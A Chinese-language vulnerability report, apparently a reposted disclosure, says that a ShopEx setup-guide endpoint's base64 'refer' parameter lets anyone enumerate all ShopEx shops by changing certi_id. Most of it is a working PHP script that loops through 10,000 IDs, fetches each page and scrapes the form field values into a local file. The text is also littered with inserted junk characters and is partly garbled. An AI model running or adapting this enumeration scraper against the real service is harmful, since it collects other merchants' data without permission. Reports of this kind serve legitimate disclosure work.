|
|
简要描述:( }* l s! G9 B4 s F9 c
ShopEx某接口缺陷,可遍历所有网站
' n) i/ [9 o3 ]详细说明:6 Z K3 O) C, ~0 S' S0 s
问题出现在shopex 网店使用向导页面 1 T' D; W' m% d/ t
* J9 D8 v" T( v. y" Z0 Z
3 O$ C8 x1 J% h1 ^
( w- a1 e4 N6 u) P0 V/ mhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
- Y" P2 S1 X8 `# E; h6 X1 H9 a1 d1 d3 ?( w1 z9 r: F; G
8 O" u, v) A3 \% ?' k. j
& `& ?- Y% x- U o. H. erefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}# n# O4 _' k3 p) a) D5 J2 x
) \* i- ], H% C0 y* Y1 A" t
. P- [( X4 ^- W
8 i; W6 Q2 M& T, V' ?2 k c2 c: I我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 & S; M# P6 v3 a$ c# Y
' l4 g5 e" {& K/ K$ D0 `8 w) j
- H" i8 s3 u3 G7 ~$ v l3 l6 V7 r. M. [1 E+ B
<?php
5 w+ `2 x( W6 ?+ y% l/ ^9 w$ m; }; A, x
for ($i=1; $i < 10000; $i++) { //遍历
. o4 R/ f' Z3 D
6 `4 T8 W w, d ShowshopExD($i);
/ p- }) k. k0 V' J1 f# N; L2 M/ ^
; ^1 O. `$ G- r2 C1 V5 U& q; _ }- D9 o+ ]; o ]5 @
9 P- }1 m& \: B% l* g: B9 Z$ Q function ShowshopExD($cid) { K" P( W& }& E7 {8 l6 c N) F, U/ e: y2 g
5 t- T* d& t& D& k2 d' a, ~
$url='http://guide.ecos.shopex.cn/step2.php';, ^6 S. ]" n6 a
- w$ ?1 M9 q' `3 x# S
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
( y6 Z$ O- w, B& k K! k: }9 V. q3 p5 M
$url = $url.'?refer='.$refer;
- }! p2 E' e0 H8 C2 q4 V t. ]! N4 F
$ch = curl_init($url);
1 A* _1 K( E8 s! T" h
. B% m: ^" Q; \- o7 E7 F( b+ \+ J curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;. r5 h9 j: ], z- z6 M) ~
' q; }2 N) T8 j0 P X. V
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
! S3 ^( s( A/ b8 [7 w0 a4 n
/ { a" Q# |* ]% {2 c $result = curl_exec($ch);
/ S1 K% E! O( n. U C0 x: m& n
0 N: L) h$ \/ @" \ $result = mb_convert_encoding($result, "gb2312", "UTF-8");4 w: c- `* k4 O c! B; p
7 s$ \) K/ e0 {/ K if(strpos($result,$refer))
! S8 W4 n4 H# A8 E+ B- z+ |% w D: y* D+ K9 [# B5 M
{
4 Z$ O- a8 V8 A6 q9 n5 x
8 A$ j3 O& n4 z5 r; [' V& ]7 m3 C $fp = fopen("c:/shopEx.txt",'ab'); //保存文件. Z2 [# P1 i& @8 u
) p! ^4 O) l2 [' s preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
, f8 E6 m5 l6 X, B6 [8 g8 k5 L/ k9 k9 T: z! T3 `+ t% m
foreach ($value[1] as $key) {0 \) Y1 z! B a, h. p
0 r4 k! s" k3 X4 a/ k
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
( p) B' u7 z: Z+ w% q+ p. p* [8 `* g& e9 w6 e) @
echo $res[1][0].':'.$res[3][0]."\r\n";
$ K9 ~% E! P6 T* P; ?( ^2 e
& k7 L; R9 N0 [9 g $col =$res[1][0].':'.$res[3][0]."\r\n";
' d/ F" h9 w1 V! E; Z
% O& J# H5 P2 E9 r2 @/ q5 _ fwrite($fp, $col, strlen($col));
- X$ U( r# b; o1 v& _. Q) t* r
4 u8 Y" ]4 P/ p }
( v/ e7 H: O. {1 G$ J1 A, I! Z: k8 l1 @/ }, }! q3 n
echo '--------------------------------'."\r\n";
! [1 E4 C2 {5 J/ i, _+ K+ [- @! V |+ F a; ~) x6 U
fclose($fp); 0 e2 X. [ O( h$ f' x9 {
. N3 M1 j- W: j* W6 ~; D }
: k. k' J( h3 ~; m& u8 S5 q
& y! p# S3 U0 [ D% A flush();
7 A- d0 n8 K" P: s$ d$ j5 ]* ]: l6 K4 E6 k1 T# w
curl_close($ch);7 Q1 |6 N9 S. R9 N
4 w- G. O ~$ |0 Q3 ^/ { } ]0 I! {) o& W( O, F+ _
6 \- G5 M/ o; S) l6 o
?>
: q/ v3 E8 L1 E( Q漏洞证明:
9 |5 S! Y, `8 p7 P& f3 jhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
3 N; m9 K' A4 M7 ]$ rrefer换成其他加密方式6 g+ H8 I/ D' v3 }7 V
|
|